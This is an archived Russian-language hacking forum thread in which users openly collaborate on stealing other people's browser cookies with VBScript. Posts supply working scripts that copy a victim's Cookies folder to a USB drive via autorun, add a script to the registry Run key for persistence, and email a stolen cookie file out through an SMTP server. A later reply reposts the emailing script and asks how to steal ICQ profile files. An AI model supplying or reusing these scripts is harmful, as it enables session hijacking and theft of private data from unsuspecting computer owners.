Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Похищение куков VBS'ом

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Веб-программинг] >> Похищение куков VBS'ом
Имя
Сообщение << Старые топики   Новые топики >>
Похищение куков VBS'ом - 2007-05-17 15:42:06.160000   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
Недавно столкнулся вот с чем:
Хотел прописать в авторан флешки vbs'ник который скопирует все куки юзера ко мне на флешку. Но я не знаю имя учётки юзаря, думал написать через %userprofile% вот так:
 
Set FSO=CreateObject("Scripting.FileSystemObject")
FSO.CopyFile "%userprofile%\Cookies", "F:\1"
 
 но нет ошибка. Как быть, что делать?
Post #: 1
RE: Похищение куков VBS'ом - 2007-05-17 19:37:53.176666   
AdReNaL1Ne

Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
Set FSO=CreateObject("Scripting.FileSystemObject")
set shell = WScript.CreateObject("WScript.Shell")
FSO.CopyFile shell.ExpandEnvironmentStrings("%userprofile%")+"\Cookies", "F:\1"
Post #: 2
RE: Похищение куков VBS'ом - 2007-05-18 13:19:38.713333   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
Спасибо!:D:D:D
Post #: 3
RE: Похищение куков VBS'ом - 2007-05-18 14:15:47.800000   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
А не, обломчик:'(, в 3 строке ошибку выдаёт8|. Типа файл не найден[&o]
Post #: 4
RE: Похищение куков VBS'ом - 2007-05-18 14:38:47.150000   
Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
Ыы
А с чего ты взял, что на другом компе флешка будет на F:\?
Post #: 5
RE: Похищение куков VBS'ом - 2007-05-18 18:16:56.593333   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
Я F:\ на D:\ поменял, у меня в системе D:\ есть, и папка D:\1 тоже, но не пашит![&:]
Post #: 6
RE: Похищение куков VBS'ом - 2007-05-18 18:19:11.470000   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
А ты сам на своём компе пробовал?
И скопировалось? Странно, у меня транслятор стандартный (который в комплекте с Win SP2).
В чём тогда может быть проблема?
Post #: 7
RE: Похищение куков VBS'ом - 2007-05-28 20:31:25.116666   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
Всётаки помогите решить проблему, полезно не тока мне!
Post #: 8
RE: Похищение куков VBS'ом - 2007-06-04 00:11:55.536666   
Krik99

Сообщений: 197
Оценки: 0
Присоединился: 2007-04-07 13:13:31.816666
Хи Хи :D:D:D
Post #: 9
RE: Похищение куков VBS'ом - 2007-06-08 22:21:17.800000   
Krik99

Сообщений: 197
Оценки: 0
Присоединился: 2007-04-07 13:13:31.816666
Вот попробывал и вот всё получилось..
Вот рабочий скрипт:

set fso=createobject("scripting.filesystemobject")
set WshShell = WScript.CreateObject("WScript.Shell")
fso.copyfolder WshShell.ExpandEnvironmentStrings("%USERPROFILE%") +"\Cookies", "E:\1"
Post #: 10
RE: Похищение куков VBS'ом - 2007-06-22 15:37:47.066666   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
Пасиба работает, всё также как у AdReNaL1Ne, но переменные другие, и регистр букв маленький.
Интересно почему в первом случае не покатило?
Post #: 11
RE: Похищение куков VBS'ом - 2007-06-22 16:34:15.656666   
RamMerLabs

Сообщений: 615
Оценки: 0
Присоединился: 2007-04-06 23:05:13.516666
1.
quote:

FSO.CopyFile…

2.
quote:

fso.copyfolder…

найди 10 отличий! :)
Post #: 12
RE: Похищение куков VBS'ом - 2007-06-22 23:32:08.530000   
Krik99

Сообщений: 197
Оценки: 0
Присоединился: 2007-04-07 13:13:31.816666
Во первых надо посмотреть в нармальный учебник по VBS…
Во вторых ты копировал фаил а какой именнно ты не указывал…
В третих надо копировать не по файлу (так как ты не знаеш их имя) а целой папкой…
В четвёртых лутче всего копировать папку не на оприделённый диск а в папку в которой лежыт у тебя скрипт…

Post #: 13
RE: Похищение куков VBS'ом - 2007-06-23 05:55:29.316666   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
quote:

Во первых надо посмотреть в нармальный учебник по VBS…
Согласин, не посоветуеш?
quote:

Во вторых ты копировал фаил а какой именнно ты не указывал…
Я сам не копировал, но 10 отличий между твоим, и AdReNaL1Ne'овским исходником нашол.
quote:

В третих надо копировать не по файлу (так как ты не знаеш их имя) а целой папкой…
Что ты и продемонстрировал в своём исходнике.
quote:

В четвёртых лутче всего копировать папку не на оприделённый диск а в папку в которой лежыт у тебя скрипт…
С этим у меня проблем не возникло, просто пишим имя каталога, расположеного в текущей папки. Пасиба:)
Post #: 14
RE: Похищение куков VBS'ом - 2007-06-23 11:03:43.116666   
Krik99

Сообщений: 197
Оценки: 0
Присоединился: 2007-04-07 13:13:31.816666
quote:


quote:


Во первых надо посмотреть в нармальный учебник по VBS…

Согласин, не посоветуеш?

Вот я недавно спрашивал где найти нормальный учебник по VBS?
И мне дали два архива с учебниками которые мне понравились…:D
Вот посмотри тут
http://pashkela.narod.ru/proggi.html
Post #: 15
RE: Похищение куков VBS'ом - 2007-06-25 17:49:47.023333   
Krik99

Сообщений: 197
Оценки: 0
Присоединился: 2007-04-07 13:13:31.816666
Как так сделать чтобы VBS скрипт сам прописовал себя в автозагрузку?
Post #: 16
RE: Похищение куков VBS'ом - 2007-06-25 22:24:12.460000   
Skull_roman

Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
Посмотри в справочнике !!!:D
Post #: 17
RE: Похищение куков VBS'ом - 2007-06-25 23:23:30.523333   
Skull_roman

Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
А давйте посмотрим с другой стороны. Как можно украсть кукисы через web сайт ???
Можно ли написать скрипт на VBS чтобы он отсылал кукисы ко мне на мыло ???
Например кто-то заходит на сайт этот скрипт срабатывает и его кукисы отсылаются ко мне на мыло !!!:D
Как вам такой вариант ?
Тока я незнаю можно ли написать на VBS Что бы файлы с чужого компа отправлялись ко мне на мыло !!!
И можно ли вообще зделать так ???
Post #: 18
RE: Похищение куков VBS'ом - 2007-06-26 07:19:16.423333   
Webkill

Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
quote:

Как так сделать чтобы VBS скрипт сам прописовал себя в автозагрузку?
Это делается так:
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "C:\\windows\\WebKill.vbs"
quote:

Посмотри в справочнике !!!
В том справочнике который мне давал Krik99 нет этого. Но там написано как редактировать реестр.
quote:

Можно ли написать скрипт на VBS чтобы он отсылал кукисы ко мне на мыло ???

Можно. Вот исходник:
quote:

On Error Resume Next
Call SendPost("smtp.mail.ru", "кому@mail.ru", "от_кого@mail.ru", "Subj", "Body")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
&nbsp;&nbsp;&nbsp; Set iMsg = CreateObject("CDO.Message")
&nbsp;&nbsp;&nbsp; Set iConf = CreateObject("CDO.Configuration")
&nbsp;&nbsp;&nbsp; Set Flds = iConf.Fields
&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp; Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
&nbsp;&nbsp;&nbsp; Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
&nbsp;&nbsp;&nbsp; Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "ваш логин" '- логин на smtp сервер
&nbsp;&nbsp;&nbsp; Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "ваш пароль" 'пароль на smtp
&nbsp;&nbsp;&nbsp; Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" 'собстно сам сервер
&nbsp;&nbsp;&nbsp; Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 'порт на smtp сервере
&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp; Flds.Update
&nbsp;&nbsp;&nbsp; iMsg.Configuration = iConf
&nbsp;&nbsp;&nbsp; iMsg.To = strTo
&nbsp;&nbsp;&nbsp; iMsg.From = strFrom
&nbsp;&nbsp;&nbsp; iMsg.Subject = strSubject
&nbsp;&nbsp;&nbsp; iMsg.TextBody = strBody
&nbsp;&nbsp;&nbsp; iMsg.AddAttachment "C:\Куки.txt"
&nbsp;&nbsp;&nbsp; iMsg.Send
End Function
&nbsp;&nbsp;&nbsp; Set iMsg = Nothing
&nbsp;&nbsp;&nbsp; Set iConf = Nothing
&nbsp;&nbsp;&nbsp; Set Flds = Nothing

Исходник нашол в обучалах от Krik99
quote:

Например кто-то заходит на сайт этот скрипт срабатывает и его кукисы отсылаются ко мне на мыло !!!

Один раз я подцепил троя, после чего пришлось сносить мд.
Подцепил я его когда юзал IE он упорно переадрисовывал меня на - snyggast.se
Посматри, может в исходниках чё найдёш!
quote:

И можно ли вообще зделать так ???
Можно, если браузер дырявый маздехплорер например.
Post #: 19
RE: Похищение куков VBS'ом - 2007-06-26 12:00:56.260000   
Krik99

Сообщений: 197
Оценки: 0
Присоединился: 2007-04-07 13:13:31.816666
Webkill
Большое спасибо…
Post #: 20
RE: Похищение куков VBS'ом - 2010-01-23 10:31:04.840000   
weni

Сообщений: 4
Оценки: 0
Присоединился: 2010-01-21 16:37:57.526666
On Error Resume Next
Call SendPost("smtp.mail.ru", "кому@mail.ru", "от_кого@mail.ru", "Subj", "Body")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields

Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "ваш логин" '- логин на smtp сервер
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "ваш пароль" 'пароль на smtp
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" 'собстно сам сервер
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 'порт на smtp сервере

Flds.Update
iMsg.Configuration = iConf
iMsg.To = strTo
iMsg.From = strFrom
iMsg.Subject = strSubject
iMsg.TextBody = strBody
iMsg.AddAttachment "C:\Куки.txt"
iMsg.Send
End Function
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing

Этот исходник мне помог, а вот проблема, как мне украсть файл, от icq 6 Owner, если я незнаю имя пользователя компа, а он именно там находится
Post #: 21
Страниц:  [1]
Все форумы >> [Веб-программинг] >> Похищение куков VBS'ом







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.